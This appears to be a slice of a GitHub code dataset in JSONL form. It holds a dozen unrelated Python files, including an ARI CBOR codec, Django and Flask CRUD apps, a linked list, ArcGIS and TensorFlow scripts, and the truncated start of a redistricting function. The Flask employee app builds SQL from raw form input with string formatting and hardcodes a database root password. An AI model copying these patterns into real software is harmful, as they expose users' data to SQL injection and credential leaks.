writer.writerow(acc_list)\n\nif __name__ == '__main__':\n main()","repo_name":"FLHonker/ZAQ-code","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8094,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"53"} +{"seq_id":"70564225129","text":"def min_and_max(num1, num2):\n\tif num1 > num2:\n\t\treturn num2, num1\n\telse:\n\t\treturn num1, num2\n\n\ndef converte_par(numero):\n\t'''Transforma um número par em um número sucessor impar'''\n\treturn numero + ((numero+1)%2)\n\ndef soma_impares(inicio, fim):\n\n\tif inicio%2 == 0:\n\t\tinicio = converte_par(inicio)\n\telse:\n\t\tinicio += 2\n\n\tsoma = 0\n\twhile inicio < fim:\t\t\n\t\tsoma += inicio\n\t\tinicio += 2\n\n\treturn soma\n\n\ndef main():\n\tnum1 = int(input())\n\tnum2 = int(input())\n\n\tnum1, num2 = min_and_max(num1, num2)\n\n\tprint(soma_impares(num1, num2))\n\n\nmain()","repo_name":"douradodev/Uri","sub_path":"Uri/1071_v3.py","file_name":"1071_v3.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23266427398","text":"import enum\nimport logging\nimport struct\nfrom typing import BinaryIO\nimport cbor2\nfrom ace.ari import (\n ARI, AC, EXPR, TNVC, Identity, ReferenceARI, LiteralARI,\n StructType, LITERAL_TYPES\n)\nfrom ace.cborutil import to_diag\nfrom ace.util import is_printable\n\n\nLOGGER = logging.getLogger(__name__)\n\n\n@enum.unique\nclass AriFlag(enum.IntFlag):\n ''' Flags at the front of an ARI. '''\n HAS_NN = 0x80\n HAS_PARAMS = 0x40\n HAS_ISS = 0x20\n HAS_TAG = 0x10\n\n\n@enum.unique\nclass TnvcFlag(enum.IntFlag):\n ''' Flgas at the front of a TNVC. '''\n MIXED = 0x8\n TYPE = 0x4\n NAME = 0x2\n VALUE = 0x1\n\n\nclass ParseError(RuntimeError):\n ''' Indicate an error in ARI parsing. '''\n\n\nclass Decoder:\n ''' The decoder portion of this CODEC. '''\n\n def decode(self, buf: BinaryIO) -> ARI:\n ''' Decode an ARI from CBOR bytestring.\n\n :param buf: The buffer to read from.\n :return: The decoded ARI.\n '''\n cbordec = cbor2.CBORDecoder(buf)\n try:\n res = self._decode_ari(cbordec)\n except cbor2.CBORDecodeEOF as err:\n raise ParseError(f'Failed to decode ARI: {err}') from err\n if buf.tell() != len(buf.getbuffer()):\n LOGGER.warning('ARI decoder handled only the first %d octets of %s',\n buf.tell(), to_diag(buf.getvalue()))\n return res\n\n def _decode_ari(self, cbordec):\n flags, = struct.unpack('!B', cbordec.read(1))\n LOGGER.debug('Got flags: 0x%02x', flags)\n str_type = StructType(flags & 0x0F)\n\n if str_type == StructType.LIT:\n try:\n val = cbordec.decode()\n except Exception as err:\n raise ParseError(f'Failed to decode literal value: {err}') from err\n\n type_enum = StructType((flags >> 4) + StructType.BOOL)\n res = LiteralARI(type_enum=type_enum, value=val)\n\n else:\n obj_nn = cbordec.decode() if flags & AriFlag.HAS_NN else None\n LOGGER.debug('Got nickname: %s', obj_nn)\n\n name = cbordec.decode()\n LOGGER.debug('Got name: %s', to_diag(name))\n if not isinstance(name, (bytes, str)):\n raise ParseError(f'Decoded name is not bytes or str, got {type(name)}')\n if isinstance(name, bytes) and is_printable(name):\n name = name.decode('utf-8')\n\n params = self._decode_tnvc(cbordec) if flags & AriFlag.HAS_PARAMS else None\n\n issuer = cbordec.decode() if flags & AriFlag.HAS_ISS else None\n LOGGER.debug('Got issuer: %s', to_diag(issuer))\n if issuer is not None and not isinstance(issuer, bytes):\n raise ParseError(f'Decoded issuer is not bytes, got {type(issuer)}')\n\n tag = cbordec.decode() if flags & AriFlag.HAS_TAG else None\n LOGGER.debug('Got tag: %s', to_diag(issuer))\n if tag is not None and not isinstance(tag, bytes):\n raise ParseError(f'Decoded tag is not bytes, got {type(tag)}')\n\n ident = Identity(\n namespace=obj_nn,\n type_enum=str_type,\n name=name,\n issuer=issuer,\n tag=tag\n )\n res = ReferenceARI(ident=ident, params=params)\n\n return res\n\n def _decode_tnvc(self, cbordec):\n ''' From the document:\n +--------+---------+----------+----------+----------+----------+\n | Flags | # Items | Types | Names | Values | Mixed |\n | [BYTE] | [UINT] | [OCTETS] | [OCTETS] | [OCTETS] | [OCTETS] |\n | | (Opt) | (Opt) | (Opt) | (Opt) | (Opt) |\n +--------+---------+----------+----------+----------+----------+\n '''\n\n flags, = struct.unpack('!B', cbordec.read(1))\n\n count = cbordec.decode() if flags else 0\n\n type_enums = []\n if flags & TnvcFlag.TYPE:\n for _idx in range(count):\n type_id = struct.unpack('!B', cbordec.read(1))[0]\n type_enums.append(StructType(type_id))\n\n if flags & TnvcFlag.NAME:\n raise NotImplementedError\n\n values = []\n if flags & TnvcFlag.VALUE:\n for idx in range(count):\n LOGGER.debug('Decoding TNVC item %d type %s',\n idx, type_enums[idx])\n values.append(self._decode_obj(type_enums[idx], cbordec))\n return values\n\n def _decode_ac_items(self, cbordec):\n # FIXME: workaorund! doesn't scale up\n item = ord(cbordec.read(1))\n count = item & 0x1F\n LOGGER.debug('AC with count %d', count)\n items = []\n for _ in range(count):\n items.append(self._decode_ari(cbordec))\n return items\n\n def _decode_obj(self, type_enum, cbordec):\n if type_enum == StructType.ARI:\n obj = self._decode_ari(cbordec)\n\n elif type_enum == StructType.AC:\n obj = AC(\n items=self._decode_ac_items(cbordec)\n )\n\n elif type_enum == StructType.EXPR:\n obj = EXPR(\n type_enum=StructType(cbordec.decode()),\n items=self._decode_ac_items(cbordec)\n )\n\n elif type_enum == StructType.TNVC:\n # FIXME: there is no distinction in text between AC and TNVC\n obj = AC(items=self._decode_tnvc(cbordec))\n\n elif type_enum in LITERAL_TYPES:\n item = cbordec.decode()\n obj = LiteralARI(type_enum=type_enum, value=item)\n\n else:\n raise ValueError(f'Unhandled param object type: {type_enum}')\n\n return obj\n\n\nclass Encoder:\n ''' The encoder portion of this CODEC. '''\n\n def encode(self, obj: ARI, buf: BinaryIO):\n ''' Encode an ARI into CBOR bytestring.\n\n :param obj: The ARI object to encode.\n :param buf: The buffer to write into.\n '''\n cborenc = cbor2.CBOREncoder(buf)\n self._encode_obj(obj, cborenc, True)\n\n def _encode_obj(self, obj, cborenc, as_ari):\n if isinstance(obj, ReferenceARI):\n self._encode_ref_ari(obj, cborenc)\n\n elif isinstance(obj, AC):\n # FIXME: workaorund! doesn't scale up\n head = bytes([0x80 | len(obj.items)])\n LOGGER.debug('AC encoding header %s', to_diag(head))\n cborenc.write(head)\n for ari in obj.items:\n self._encode_ref_ari(ari, cborenc)\n\n elif isinstance(obj, EXPR):\n cborenc.encode(obj.type_enum.value)\n # FIXME: workaorund! doesn't scale up\n head = bytes([0x80 | len(obj.items)])\n LOGGER.debug('EXPR encoding type %s, header %s',\n obj.type_enum.value, to_diag(head))\n cborenc.write(head)\n for ari in obj.items:\n self._encode_ref_ari(ari, cborenc)\n\n elif isinstance(obj, TNVC):\n self._encode_tnvc(obj.items, cborenc)\n\n elif isinstance(obj, LiteralARI):\n if obj.type_enum == StructType.BSTR:\n cborenc.encode(obj.value)\n return\n\n if as_ari:\n flags = (\n ((obj.type_enum - StructType.BOOL) << 4)\n | StructType.LIT\n )\n cborenc.write(struct.pack('!B', flags))\n cborenc.encode(obj.value)\n\n else:\n raise TypeError(f'Unhandled object type {type(obj)} for: {obj}')\n\n def _encode_ref_ari(self, obj, cborenc):\n flags = int(obj.ident.type_enum)\n if obj.ident.namespace is not None:\n flags |= AriFlag.HAS_NN\n if obj.params is not None:\n flags |= AriFlag.HAS_PARAMS\n if obj.ident.issuer is not None:\n flags |= AriFlag.HAS_ISS\n if obj.ident.tag is not None:\n flags |= AriFlag.HAS_TAG\n LOGGER.debug('ReferenceARI encoding flags %s', to_diag(flags))\n cborenc.write(struct.pack('!B', flags))\n\n if obj.ident.namespace is not None:\n cborenc.encode(obj.ident.namespace)\n \n # amp is expecting a bytestring\n cborenc.encode(\n obj.ident.name if isinstance(obj.ident.name, bytes)\n else str(obj.ident.name).encode('utf-8')\n )\n \n if obj.params is not None:\n self._encode_tnvc(obj.params, cborenc)\n if obj.ident.issuer is not None:\n cborenc.encode(obj.ident.issuer)\n if obj.ident.tag is not None:\n cborenc.encode(obj.ident.tag)\n\n def _encode_tnvc(self, params, cborenc):\n LOGGER.debug('TNVC encoding count %s', len(params))\n flags = 0\n if params:\n flags |= TnvcFlag.TYPE | TnvcFlag.VALUE\n cborenc.write(struct.pack('!B', flags))\n\n if flags:\n cborenc.encode(len(params))\n\n for param in params:\n if isinstance(param, ReferenceARI):\n type_enum = StructType.ARI\n elif isinstance(param, AC):\n type_enum = StructType.AC\n elif isinstance(param, EXPR):\n type_enum = StructType.EXPR\n elif isinstance(param, TNVC):\n type_enum = StructType.TNVC\n elif isinstance(param, LiteralARI):\n type_enum = param.type_enum\n else:\n LOGGER.warning(\n 'Unhandled parameter type %s for: %s',\n type(param), param\n )\n cborenc.write(struct.pack('!B', type_enum))\n\n for param in params:\n LOGGER.debug('TNVC encoding item %s', param)\n self._encode_obj(param, cborenc, as_ari=False)\n","repo_name":"NASA-AMMOS/anms-ace","sub_path":"src/ace/ari_cbor.py","file_name":"ari_cbor.py","file_ext":"py","file_size_in_byte":9699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27147653440","text":"import tensorflow as tf\n\n#Training: Load image, (semi randomly) augmentate the image and subtract per image mean and std\ndef _load_and_preprocess_image_train(image_path, label=None):\n\n image = image_path\n image = tf.io.read_file(image_path)\n image = tf.image.decode_png(image, channels=3)\n image = tf.image.convert_image_dtype(image, tf.float32)\n image = tf.image.random_flip_left_right(image)\n image = tf.image.random_flip_up_down(image)\n\n image = tf.image.per_image_standardization(image)\n \n if label == None:\n return image\n\n else:\n return image, label\n\n#Validation/Test: Load image and subtract per image mean and std\ndef _load_and_preprocess_image_test(image_path, label=None):\n\n image = image_path\n image = tf.io.read_file(image_path)\n image = tf.image.decode_png(image, channels=3)\n\n image = tf.image.convert_image_dtype(image, tf.float32)\n image = tf.image.per_image_standardization(image)\n \n if label == None:\n return image\n\n else:\n return image, label\n\n\n\n#This function generates the image batches\n#if shuffle is True: dataset will be shuffled before batching\n#if predict is True: dataset will not be repeated (important for the last batch in case of predicting the validation/test data)\ndef batch_dataset(dataset, batch_size, shuffle=True, predict=False):\n\n if shuffle == True:\n dataset = dataset.shuffle(buffer_size=20 * 1000 * batch_size)\n \n #For training: augmentate the images (random flip after loading)\n if predict == False:\n dataset = dataset.repeat()\n dataset = dataset.map(_load_and_preprocess_image_train, num_parallel_calls=tf.data.experimental.AUTOTUNE)\n \n #For validation/test: No image augmentation upon creating the batch\n else:\n dataset = dataset.repeat(1)\n dataset = dataset.map(_load_and_preprocess_image_test, num_parallel_calls=tf.data.experimental.AUTOTUNE)\n\n #Create the batch and prefetch\n dataset = dataset.batch(batch_size)\n dataset = dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE)\n \n return dataset\n","repo_name":"Ay-De/SLM-CNN","sub_path":"CNN/modules/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"2024048779","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom .models import Profesionales, Especialidades\nfrom django.contrib.auth.models import User\nfrom .forms import Profesionales_Form, Usuario_Form, Especialidades_Form\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.contrib import messages\n# Create your views here.\n\ndef profesionales_lista(request):\n queryset = Profesionales.objects.all\n if request.user.is_authenticated():\n context = {\n \"title\": \"Mi lista de profesionales\",\n \"object_list\": queryset,\n }\n else:\n context = {\n \"title\": \"Lista / No logueado\"\n }\n return render(request, \"profesionales_lista.html\", context)\n\n\ndef profesionales_detalle(request, id):\n instancia = get_object_or_404(Profesionales, id=id)\n context = {\n \"instancia\": instancia,\n \"nombre\": instancia.Nombre,\n }\n return render(request, \"profesionales_detalle.html\", context)\n\ndef profesionales_crear(request):\n form = Profesionales_Form(request.POST or None)\n if form.is_valid():\n instancia = form.save(commit=False)\n instancia.save()\n messages.success(request, \"Creado Exitosamente!\")\n return HttpResponseRedirect(instancia.get_url_lista())\n context = {\n \"form\": form,\n }\n return render(request, \"profesionales_form.html\", context)\n\n\ndef profesionales_edita(request, id):\n instancia = get_object_or_404(Profesionales,id=id)\n form = Profesionales_Form(request.POST or None, instance=instancia)\n if form.is_valid():\n instancia = form.save(commit=False)\n instancia.save()\n messages.success(request, \"Profesional Actualizado!\")\n\n return HttpResponseRedirect(instancia.get_url_lista())\n context = {\n \"form\": form,\n \"instancia\": instancia,\n }\n\n return render(request, \"profesionales_editar_form.html\", context)\n\n\ndef profesionales_borrar(request, id=None):\n instancia = get_object_or_404(Profesionales, id=id)\n instancia.delete()\n messages.success(request, \"Profesional Borrado!\")\n\n return redirect(\"profesionales:lista\")\n\n\ndef especialidad_crear(request):\n form = Especialidades_Form(request.POST or None)\n if form.is_valid():\n instancia = form.save(commit=False)\n instancia.save()\n messages.success(request, \"Creado Exitosamente!\")\n return HttpResponseRedirect(\"/profesionales\")\n context = {\n \"form\": form,\n }\n return render(request, \"especialidades_form.html\", context)\n","repo_name":"Naukas1/GIP_Final","sub_path":"GIP/Profesionales/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21598242725","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.prev = None\n self.next = None\n\n\nclass LinkedList:\n def __init__(self):\n self.start = None\n\n def display(self):\n current = self.start\n while current is not None:\n print(current.data)\n current = current.next\n\n def is_empty(self) -> bool:\n return not self.start\n\n def prepend(self, data):\n if not self.start:\n self.start = Node(data)\n return\n\n tmp_node = Node(data)\n tmp_node.next = self.start\n self.start.prev = tmp_node\n self.start = tmp_node\n\n def append(self, data):\n if not self.start:\n self.start = Node(data)\n return\n\n last = self.start\n while last.next is not None:\n last = last.next\n\n tmp_node = Node(data)\n last.next = tmp_node\n tmp_node.prev = last\n\n def insert_after(self, target_data, data):\n if self.is_empty():\n raise ValueError(\"The list is empty!\")\n\n found = self.start\n while found is not None:\n if found.data == target_data:\n break\n found = found.next\n\n if not found:\n raise ValueError(f\"There is no element in the list: {data}!\")\n\n tmp_node = Node(data)\n found_last = True if not found.next else False\n if found_last:\n found.next = tmp_node\n tmp_node.prev = found\n else:\n tmp_node.prev = found\n tmp_node.next = found.next\n found.next.prev = tmp_node\n found.next = tmp_node\n\n def insert_before(self, target_data, data):\n if self.is_empty():\n raise ValueError(\"The list is empty!\")\n\n found = self.start\n while found is not None:\n if found.data == target_data:\n break\n found = found.next\n\n if not found:\n raise ValueError(f\"There is no element in the list: {data}!\")\n\n tmp_node = Node(data)\n if found is self.start:\n self.prepend(data)\n else:\n tmp_node.next = found\n tmp_node.prev = found.prev\n found.prev.next = tmp_node\n found.prev = tmp_node\n\n def delete(self, data):\n if self.is_empty():\n raise ValueError(\"The list is empty!\")\n\n found = self.start\n while found is not None:\n if found.data == data:\n break\n found = found.next\n\n if not found:\n raise ValueError(f\"There is no element in the list: {data}!\")\n\n if found is self.start:\n if found.next is None:\n self.start = None\n else:\n self.start = self.start.next\n return\n\n left, right = found.prev, found.next\n left.next = right\n right.prev = left\n\n\nlst = LinkedList()\nlst.append(3)\nlst.prepend(1)\nlst.insert_after(1, 2)\nlst.insert_before(1, 0)\nlst.insert_after(2, 100)\nlst.delete(2)\nlst.display()\n","repo_name":"TheArman/ooad_tasks","sub_path":"5_hmw/1_linked_list.py","file_name":"1_linked_list.py","file_ext":"py","file_size_in_byte":3079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70141727210","text":"from flask import Flask, render_template, request, redirect, url_for\nfrom flask_mysqldb import MySQL\n\napp = Flask(__name__)\n\napp.config['MYSQL_HOST'] = 'localhost'\napp.config['MYSQL_USER'] = 'root'\napp.config['MYSQL_PASSWORD'] = 'Jocelyn!180'\napp.config['MYSQL_DB'] = 'shoe_store'\n\nmysql = MySQL(app)\n\n# while True:\n# #username = input(\"Enter username: \")\n# #password = input(\"Enter password: \")\n# try:\n# cnx = pymysql.connect(host='localhost', user='root', password='Jocelyn!180', db='shoe_store')\n# cur = cnx.cursor()\n# if cnx:\n# break\n# else:\n# continue\n# except:\n# print('Couldn\\'t connect to the server. Please enter credentials again.')\n#\n\n\n@app.route('/')\ndef ind():\n\n cur = mysql.connection.cursor()\n cur.execute(\"SELECT * FROM employee\")\n data = cur.fetchall()\n cur.close()\n\n return render_template('index.html', employees = data)\n\n\n@app.route('/insert', methods=['POST'])\ndef insert():\n if request.method == \"POST\":\n employee_id = request.form['employee_id']\n salary = request.form['salary']\n first_name = request.form['first_name']\n last_name = request.form['last_name']\n start_date = request.form['start_date']\n branch_id = request.form['branch_id']\n job_title = request.form['job_title']\n\n cur = mysql.connection.cursor()\n\n ins_st = '''INSERT INTO employee (employee_id, salary, first_name, last_name,\n start_date, branch_id, job_title) VALUES ('{}', '{}', '{}', '{}', '{}','{}', '{}')'''.format(employee_id, salary, first_name, last_name, start_date, branch_id, job_title)\n print(ins_st)\n cur.execute(ins_st)\n\n mysql.connection.commit()\n return redirect(url_for('ind'))\n\n\n@app.route('/update', methods= ['POST', 'GET'])\ndef update():\n if request.method == \"POST\":\n employee_id = request.form['employee_id']\n salary = request.form['salary']\n first_name = request.form['first_name']\n last_name = request.form['last_name']\n start_date = request.form['start_date']\n branch_id = request.form['branch_id']\n job_title = request.form['job_title']\n\n cur = mysql.connection.cursor()\n\n ins_st = '''UPDATE employee SET salary='{}', first_name='{}', last_name='{}',\n start_date='{}', branch_id='{}', job_title='{}' \n WHERE employee_id='{}' '''.format(salary, first_name, last_name, start_date, branch_id, job_title, employee_id)\n cur.execute(ins_st)\n mysql.connection.commit()\n return redirect(url_for('ind'))\n\n\n@app.route('/delete/', methods = ['POST', 'GET'] )\ndef delete(employee_id):\n\n cur = mysql.connection.cursor()\n cur.execute(\"DELETE FROM employee WHERE employee_id = %s\", [employee_id])\n mysql.connection.commit()\n return redirect(url_for('ind'))\n\n\nif __name__ == \"__main__\":\n # had app.run(debug=True) before for debugging purposes.\n app.run()\n","repo_name":"kevingzheng/ShoeStoreDB","sub_path":"shoe_store_project/FlaskCrudApplication/App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32235914907","text":"########################################################################################################################\n# File name: 2a_NEON_gridded_point_count_at_h_to_minimum_bounding_volume.py\n# Author: Mike Gough\n# Date created: 06/05/2023\n# Python Version: 3.x\n# Description:\n# Calculates the minimum bounding volume for a set of pre-processed LiDAR point returns.\n# Requires a fishnet with X,Y coordinates of the centroid (spatial join with fishnet labels), and a set of input points\n# with a z value and height_above_ground.\n########################################################################################################################\n\nimport arcpy\nimport math\narcpy.env.overwriteOutput = True\n\ninput_fishnet_with_xy = r\"G:\\CALFIRE_Decision_support_system_2021_mike_gough\\Tasks\\NEON\\Data\\Inputs\\Volume\\Vector_Fishnets.gdb\\Fishnet_LiDAR_Point_Extent_1_Tower_Location_For_Volume_Calculation_Join_XY\"\ninput_point_with_z = r\"G:\\CALFIRE_Decision_support_system_2021_mike_gough\\Tasks\\NEON\\Data\\Intermediate\\Volume\\Volume.gdb\\Lidar_Points_with_Elevation_Extent_1_Tower_Location\"\nintersect_fc = r\"G:\\CALFIRE_Decision_support_system_2021_mike_gough\\Tasks\\NEON\\Data\\Intermediate\\Volume\\Volume.gdb\\LiDAR_Points_with_X_Y_Z_Index\"\n\n#output_fc = r\"G:\\CALFIRE_Decision_support_system_2021_mike_gough\\Tasks\\NEON\\Data\\Outputs\\Outputs.gdb\\minimum_bounding_volume_envelope\"\n#output_fc = r\"G:\\CALFIRE_Decision_support_system_2021_mike_gough\\Tasks\\NEON\\Data\\Outputs\\Outputs.gdb\\minimum_bounding_volume_sphere\"\n#output_fc = r\"G:\\CALFIRE_Decision_support_system_2021_mike_gough\\Tasks\\NEON\\Data\\Outputs\\Outputs.gdb\\minimum_bounding_volume_convex_hull\"\noutput_fc = r\"G:\\CALFIRE_Decision_support_system_2021_mike_gough\\Tasks\\NEON\\Data\\Outputs\\Outputs.gdb\\minimum_bounding_volume_concave_hull\"\n\nprint(\"Intersecting Fishnet and Input Points\")\narcpy.Intersect_analysis([input_point_with_z, input_fishnet_with_xy], intersect_fc, \"ALL\")\narcpy.AddField_management(intersect_fc, \"Z_Index\")\n\nprint(\"Removing ground points. Adding integer based Z-Index\")\nwith arcpy.da.UpdateCursor(intersect_fc, [\"Z_Max\", \"height_from_ground\", \"Z_Index\"]) as uc:\n for row in uc:\n z_index = math.floor(row[1])\n if z_index == 0:\n uc.deleteRow()\n else:\n row[2] = z_index\n uc.updateRow(row)\n\n# Notes: Sphere creates volumes that extend beyond the 3D cubes.\narcpy.ddd.MinimumBoundingVolume(intersect_fc, \"Z_Max\", output_fc, \"CONCAVE_HULL\", \"LIST\", \"POINT_X;POINT_Y;Z_Index\", \"MBV_FIELDS\")\n\narcpy.AddField_management(output_fc, \"MBV_Percent\", \"DOUBLE\")\n\nwith arcpy.da.UpdateCursor(output_fc, [\"MBV_Volume\", \"MBV_Percent\"]) as uc:\n for row in uc:\n volumetric_percent = row[0] / 1 * 100\n row[1] = volumetric_percent\n uc.updateRow(row)\n\n\n\n","repo_name":"consbio/CALFIRE-Decision-support-system-2021-Wind","sub_path":"2a_NEON_gridded_point_count_at_h_to_minimum_bounding_volume.py","file_name":"2a_NEON_gridded_point_count_at_h_to_minimum_bounding_volume.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30656699262","text":"import tensorflow # 딥러닝\nimport numpy as np # 수치계산\nimport cv2 # opencv2\nimport pyautogui # 마우스 x, y 좌표 확인용\nimport time # 시간 사용\n\nWINDOW_NAME = 'plasticBottleHelper'\ncheck_screen = 1 # 1: 카메라 화면, 2: 라벨 X, 3: 라벨 O\nprev_time = 0\nFPS = 10\nprediction_value = 0.98\n\n# 모델 위치\nmodel_filename = '/plasticBottleHelper/converted_keras/keras_model.h5'\nimg_filename1 = '/plasticBottleHelper/image1.png'\nimg_filename2 = '/plasticBottleHelper/image2.png'\n\n# 케라스 모델 가져오기\nmodel = tensorflow.keras.models.load_model(model_filename)\n\n# 카메라를 제어할 수 있는 객체\n# 외부 웹캠으로 비디오 캡처 초기화\ncapture = cv2.VideoCapture(1)\n# 외부 웹캠이 없다면 내장 웹캠을 사용\nif not capture.read()[0]:\n capture = cv2.VideoCapture(0)\n\n# Full screen mode\ncv2.namedWindow(WINDOW_NAME, cv2.WINDOW_NORMAL)\ncv2.setWindowProperty(WINDOW_NAME, cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)\n\n# 마우스 이벤트\ndef mouse_event(event, x, y, flags, param): \n global check_screen\n \n if event == cv2.EVENT_LBUTTONDOWN:\n if (check_screen != 1) & (1280 < X < 2515) & (1140 < Y < 1412):\n check_screen = 1\n\nwhile True:\n # 프레임 계산 10fps\n current_time = time.time() - prev_time\n \n if check_screen == 1:\n # 비디오를 한 프레임씩 읽기\n ret, frame = capture.read()\n if not ret:\n break\n\n # 비디오 좌우 반전\n # frame = cv2.flip(frame, 1)\n # 비디오 상하 반전\n # frame = cv2.flip(frame, 0)\n\n # 비디오 크기 재설정\n frame_resize = frame[:, 80:80+frame.shape[0]]\n frame_input = cv2.resize(frame_resize, (224, 224))\n\n frame_input = cv2.cvtColor(frame_input, cv2.COLOR_BGR2RGB)\n frame_input = (frame_input.astype(np.float32) / 127.0) - 1\n frame_input = np.expand_dims(frame_input, axis=0)\n\n prediction = model.predict(frame_input)\n \n cv2.rectangle(frame, (80, 0), (80+frame.shape[0], frame.shape[0]), (0, 0, 255), 5)\n cv2.putText(frame, str(round(prediction[0, 0], 5)), (10, 30), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0))\n cv2.putText(frame, str(round(prediction[0, 1], 5)), (10, 50), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0))\n cv2.putText(frame, str(round(prediction[0, 2], 5)), (10, 70), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0))\n \n else:\n X, Y = pyautogui.position()\n H, W = frame.shape[:2]\n \n if check_screen == 2:\n frame = cv2.imread(img_filename1)\n else: # if check_screen == 3:\n frame = cv2.imread(img_filename2)\n \n # 버튼 \n cv2.setMouseCallback(WINDOW_NAME, mouse_event, frame)\n cv2.putText(frame, \"X : \" + str(X), (10, 30), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0))\n cv2.putText(frame, \"Y : \" + str(Y), (10, 50), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0))\n cv2.putText(frame, \"H : \" + str(H), (10, 70), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0))\n cv2.putText(frame, \"W : \" + str(W), (10, 90), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0))\n\n # 종료 버튼 0xFF == 64bit\n if cv2.waitKey(1) & 0xFF == ord('q'):\n check_screen = 1\n\n if(prediction[0, 0] > prediction[0, 1]):\n if (prediction[0, 0] > prediction_value):\n check_screen = 2\n prediction[0, 0] = 0\n prediction[0, 1] = 0\n\n if(prediction[0, 1] > prediction[0, 0]):\n if (prediction[0, 1] > prediction_value):\n check_screen = 3\n prediction[0, 0] = 0\n prediction[0, 1] = 0\n\n # 출력\n if (ret is True) & (current_time > 1./ FPS) :\n prev_time = time.time()\n cv2.imshow(WINDOW_NAME, frame)\n\n# 비디오 캡처 개체 해제\ncapture.release()\ncv2.destroyAllWindows()","repo_name":"mikwain09/plastic_bottle_helper","sub_path":"plastic_bottle_helper.py","file_name":"plastic_bottle_helper.py","file_ext":"py","file_size_in_byte":3844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33207814597","text":"import psycopg2\nimport os\nfrom Connection import Connection\nimport urllib.parse as up\n\n\nclass ElephantConnection(Connection):\n\n def __init__(self):\n super().__init__()\n\n def connect(self):\n try:\n\n # read connection parameters\n params = self.config(section='elephantsql')\n\n up.uses_netloc.append(\"postgres\")\n super().conn = psycopg2.connect(\n database=params['database'],\n user=params['user'],\n password=params['password'],\n host=params['host'],\n port=params['port']\n )\n print('Connect to the PostgreSQL on ElephantSQL successfully')\n\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n","repo_name":"chirunnuj/python-database-tutorial","sub_path":"ElephantConnection.py","file_name":"ElephantConnection.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"166286422","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 28 15:50:57 2020\n\n@author: darac\n\"\"\"\nimport random\nimport networkx as nx\nimport csv\nimport os\nimport shutil\nfrom functools import partial\nimport json\nimport math\nimport numpy as np\nimport geopandas as gpd\nimport matplotlib\n# matplotlib.use('Agg')\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport pandas as pd\nimport collections\nfrom enum import Enum\nimport re\nimport scipy\nfrom scipy import stats\nimport time\nimport heapq\nimport operator\n\n\n# modification of https://github.com/mggg/VRA_ensembles/TX/run_functions.py\n\n\nDIR = ''\n\n\ndef precompute_state_weights(num_districts, elec_sets, elec_set_dict, recency_W1, EI_statewide, primary_elecs, \\\n runoff_elecs, elec_match_dict, min_cand_weights_dict, cand_race_dict):\n \"\"\"\n Returns election weights for state and equal scores for Black, Latino and Neither\n effectivness. Election weights are the same across districts for these scores, as they \n use statewide candidate preferences (and all weights = 1 for the equal score). It also returns\n dataframes of statewide Latino and Black-preferred candidates in primaries and runoffs.\n \"\"\"\n black_pref_cands_prim_state = pd.DataFrame(columns=range(num_districts))\n black_pref_cands_prim_state[\"Election Set\"] = elec_sets\n hisp_pref_cands_prim_state = pd.DataFrame(columns=range(num_districts))\n hisp_pref_cands_prim_state[\"Election Set\"] = elec_sets\n black_pref_cands_runoffs_state = pd.DataFrame(columns=range(num_districts))\n black_pref_cands_runoffs_state[\"Election Set\"] = elec_sets\n hisp_pref_cands_runoffs_state = pd.DataFrame(columns=range(num_districts))\n hisp_pref_cands_runoffs_state[\"Election Set\"] = elec_sets\n\n black_ei_prob = [EI_statewide.loc[((EI_statewide[\"Election\"] == elec_set_dict[elec_set]['Primary']) & \\\n (EI_statewide[\"Demog\"] == 'BCVAP')), \"prob\"].values[0] \\\n for elec_set in elec_sets]\n\n black_ei_conf = [prob_conf_conversion(x) for x in black_ei_prob]\n black_conf_W3_state = np.tile(black_ei_conf, (num_districts, 1)).transpose()\n\n hisp_ei_prob = [EI_statewide.loc[((EI_statewide[\"Election\"] == elec_set_dict[elec_set]['Primary']) &\n (EI_statewide[\"Demog\"] == 'HCVAP')), \"prob\"].values[0]\n for elec_set in elec_sets]\n\n hisp_ei_conf = [prob_conf_conversion(x) for x in hisp_ei_prob]\n hisp_conf_W3_state = np.tile(hisp_ei_conf, (num_districts, 1)).transpose()\n\n neither_ei_conf = [prob_conf_conversion(x * y) for x, y in zip(black_ei_prob, hisp_ei_prob)]\n neither_conf_W3_state = np.tile(neither_ei_conf, (num_districts, 1)).transpose()\n\n # pre-compute W2 and W3 for 